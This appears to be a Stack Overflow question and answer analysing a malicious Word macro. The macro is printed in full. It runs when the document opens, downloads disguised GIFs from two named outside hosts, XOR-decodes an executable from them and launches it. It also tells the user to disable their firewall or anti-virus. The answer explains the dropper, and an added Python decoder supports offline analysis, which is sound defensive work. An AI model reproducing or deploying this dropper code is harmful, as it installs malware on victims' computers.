The spammer / attacker / bad person sent an MS Word document containing a large macro. Can anyone understand what this macro does?

An example context to allow Stack Overflow to post this question.

Here he tries to combine his work with poppy and Windows, I suppose.

#If VBA7 And Win64 Then
Private Declare PtrSafe Function Du9sahjjfje Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal Operation As String, ByVal Filename As String, Optional ByVal Parameters As String, Optional ByVal Directory As String, Optional ByVal WindowStyle As Long = vbMaximizedFocus) As LongLong
Private Declare PtrSafe Function Uhdwuud Lib "kernel32" Alias "GetTempPathA" (ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long
Private Declare PtrSafe Function Uhduiuwd Lib "kernel32" Alias "GetTempFileNameA" (ByVal lpszPath As String, ByVal lpPrefixString As String, ByVal wUnique As Long, ByVal lpTempFileName As String) As Long
Private Declare PtrSafe Function Gshwjf Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
#Else
Private Declare Function Du9sahjjfje Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal Operation As String, ByVal Filename As String, Optional ByVal Parameters As String, Optional ByVal Directory As String, Optional ByVal WindowStyle As Long = vbMaximizedFocus) As Long
Private Declare Function Uhdwuud Lib "kernel32" Alias "GetTempPathA" (ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long
Private Declare Function Uhduiuwd Lib "kernel32" Alias "GetTempFileNameA" (ByVal lpszPath As String, ByVal lpPrefixString As String, ByVal wUnique As Long, ByVal lpTempFileName As String) As Long
Private Declare Function Gshwjf Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
#End If


This attacker appears to be opening this document.

Sub Document_Open()

Dim wyqud As String
Dim zdwie As Long
Dim rufhd As Long
Dim bldos As Integer
Dim mufid() As Byte

#If Win64 Then
Dim kmvbf As LongLong
#Else
Dim kmvbf As Long
#End If


What does it do?

ActiveDocument.Content.Delete
ActiveDocument.PageSetup.LeftMargin = 240
ActiveDocument.PageSetup.TopMargin = 100

Set myRange = ActiveDocument.Content

With myRange.Font
 .Name = "Verdana"
 .Size = 14
End With

ActiveDocument.Range.Text = "Check SSL certificate." & vbLf & "     Please wait..."


Is this supposed to damage my computer?

DoEvents
DoEvents
DoEvents
DoEvents

wyqud = lwyfu
zdwie = Gshwjf(0, "http://adenzia.ch/_vti_cnf/bug.gif", wyqud, 0, 0)
rufhd = FileLen(wyqud)

If zdwie <> 0 And rufhd < 152143 Then
zdwie = Gshwjf(0, "http://kingofstreets.de/class/meq.gif", wyqud, 0, 0)
rufhd = FileLen(wyqud)
End If


If rufhd < 154743 Then
ActiveDocument.Content.Delete
MsgBox "No internet access. Turn off any firewall or anti-virus software and try again.", vbCritical, "Error"
Exit Sub
End If

bldos = FreeFile
Open wyqud For Binary As #bldos
ReDim mufid(0 To LOF(bldos) - 1)
Get #bldos, , mufid()
Close #bldos

Call duwif(mufid())


Don't know what it does.

wyqud = Left(wyqud, Len(wyqud) - 3)
wyqud = wyqud & "exe"

bldos = FreeFile
Open wyqud For Binary As #bldos
Put #bldos, , mufid()
Close #bldos


kmvbf = Du9sahjjfje(0, "Open", "explorer.exe", wyqud)

ActiveDocument.Content.Delete
MsgBox "The file is corrupted and cannot be opened", vbCritical, "Error"

End Sub


Skillfully written unreadable code.

Public Function lwyfu() As String
  Dim djfie As String * 512
  Dim pwifu As String * 576
  Dim dwuf As Long
  Dim wefkg As String
  dwuf = Uhdwuud(512, djfie)
  If (dwuf > 0 And dwuf < 512) Then
    dwuf = Uhduiuwd(djfie, 0, 0, pwifu)
    If dwuf <> 0 Then
        wefkg = Left$(pwifu, InStr(pwifu, vbNullChar) - 1)
    End If
    lwyfu = wefkg
  End If
End Function


Another function.

Public Sub duwif(mufid() As Byte)
  Dim dfety As Long
  Dim bvjwi As Long
  Dim wbdys As Long
  Dim dvywi(256) As Byte
  Dim wdals As Long
  Dim dwiqh As Long


  bvjwi = UBound(mufid) + 1

  For dfety = 10 To 265
    dvywi(dfety - 10) = mufid(dfety)
  Next

  wdals = UBound(dvywi) + 1

  dwiqh = 0
  For dfety = 266 To (bvjwi - 267)
    mufid(dfety - 266) = mufid(dfety) Xor dvywi(dwiqh)
    dwiqh = dwiqh + 1

    If dwiqh = (wdals - 1) Then
        dwiqh = 0
    End If
  Next

  ReDim Preserve mufid(bvjwi - 267)

End Sub


End of macro.

+3




1 answer


The comments are correct; the macro downloads malware / spyware and executes it.

It tries to use both GIF URLs (and even prompts the user to turn off their firewall / AV if the download fails). The two GIFs are identical (same SHA256 checksum), they have a matching GIF header block ("GIF89a"), and they even have some bytes describing what the image data should be.

The macro uses a subroutine duwif() (line 105) to extract the executable binary from the loaded GIF. It stores the binary in a temporary file, which is referenced by the function lwyfu() (line 90).

Then the macro runs on line 82:

kmvbf = Du9sahjjfje(0, "Open", "explorer.exe", wyqud)


You can modify the macro to remove / comment the execution statement and insert something harmless. For example:

REM kmvbf = Du9sahjjfje(0, "Open", "explorer.exe", wyqud)
MsgBox wyqud


This opens a message box with the path to the extracted binary instead of executing it.

Binary checksum (SHA256):

55f4cc0f9258efc270aa5e6a3b7acde29962fe64b40c2eb36ef08a7a1369a5bd

Several antivirus providers mark this file as malware, and automatic analysis reveals some suspicious activity.

+1


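As an added example (not code from the question or from the answer above), the following Python re-implements the duwif() decoder from the posted macro so an analyst can recover the embedded executable from a downloaded "GIF" on an analysis machine without ever running the macro, and then sanity-checks the result for a PE header. It follows the VBA index arithmetic exactly: the 256-byte XOR key sits at bytes 10..265 of the download, the encoded payload starts at byte 266, and the ReDim Preserve keeps 266 more bytes than were decoded, so the written .exe ends with leftover undecoded input. The blob it decodes is constructed inline for the test; the key, the payload and the helper names (decode_payload, build_sample_blob, looks_like_pe, sample_payload) are mine, not the macro's.

```python
"""Offline re-implementation of the macro's duwif() XOR decoder (added example).

Nothing here downloads or executes anything; it only transforms bytes that an
analyst already has on disk. The sample blob is constructed, not a real sample.
"""

KEY_OFFSET = 10      # dvywi(dfety - 10) = mufid(dfety) for dfety = 10 .. 265
KEY_LENGTH = 256     # key index wraps when it reaches wdals - 1 = 256
DATA_OFFSET = 266    # the XOR loop starts reading at mufid(266) ...
TAIL = 266           # ... and stops at mufid(bvjwi - 267)


def decode_payload(blob: bytes) -> bytes:
    """Mirror duwif(): XOR blob[266 : n-266] with the 256-byte key at blob[10:266].

    duwif() writes each decoded byte back into the same buffer at index (i - 266)
    and then does ReDim Preserve mufid(bvjwi - 267): it keeps n - 266 bytes although
    it decoded only n - 532, so the result ends with 266 bytes of untouched input.
    That is exactly what the macro writes to the .exe; PE loaders ignore such
    trailing overlay bytes, so the file still runs.
    """
    n = len(blob)
    if n < DATA_OFFSET + TAIL:
        raise ValueError("blob too short to hold a key and a payload")
    key = blob[KEY_OFFSET:KEY_OFFSET + KEY_LENGTH]   # copied before the loop, like dvywi
    buf = bytearray(blob)                             # the macro decodes in place
    for i in range(DATA_OFFSET, n - TAIL):            # dfety = 266 .. bvjwi - 267
        buf[i - DATA_OFFSET] = buf[i] ^ key[(i - DATA_OFFSET) % KEY_LENGTH]
    return bytes(buf[:n - TAIL])                      # ReDim Preserve mufid(bvjwi - 267)


def looks_like_pe(data: bytes) -> bool:
    """Cheap sanity check on decoded bytes: an MZ stub and a PE signature at e_lfanew."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def sample_payload() -> bytes:
    """Constructed 256-byte stand-in for an executable: MZ stub, e_lfanew = 0x40, PE signature."""
    payload = bytearray(0x100)
    payload[0:2] = b"MZ"
    payload[0x3C:0x40] = (0x40).to_bytes(4, "little")
    payload[0x40:0x44] = b"PE\0\0"
    return bytes(payload)


def build_sample_blob(payload: bytes, key: bytes) -> bytes:
    """Construct a download in the layout duwif() expects (test data, not a real sample):
    a 10-byte GIF89a-style header, the 256-byte key, the XOR-encoded payload and
    266 filler bytes so the loop's upper bound lands exactly on the payload end."""
    if len(key) != KEY_LENGTH:
        raise ValueError("key must be 256 bytes")
    header = b"GIF89a" + bytes([0x01, 0x00, 0x01, 0x00])   # 1x1 logical screen
    encoded = bytes(b ^ key[i % KEY_LENGTH] for i, b in enumerate(payload))
    return header + key + encoded + bytes(TAIL)


if __name__ == "__main__":
    key = bytes((i * 7 + 3) & 0xFF for i in range(KEY_LENGTH))   # constructed key
    blob = build_sample_blob(sample_payload(), key)
    out = decode_payload(blob)
    print("download starts with:", blob[:6])           # b'GIF89a', what the macro fetches
    print("decoded bytes start with:", out[:2])        # b'MZ'
    print("PE signature found:", looks_like_pe(out))   # True
    print("trailing undecoded bytes:", len(out) - len(sample_payload()))   # 266
```

On a real download you would call decode_payload() on the file contents and hash the result instead of writing it to disk with an .exe extension; note that the macro itself only proceeds when the download is at least 154743 bytes, so a file of that size or larger with a GIF89a header is the shape this loader expects.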






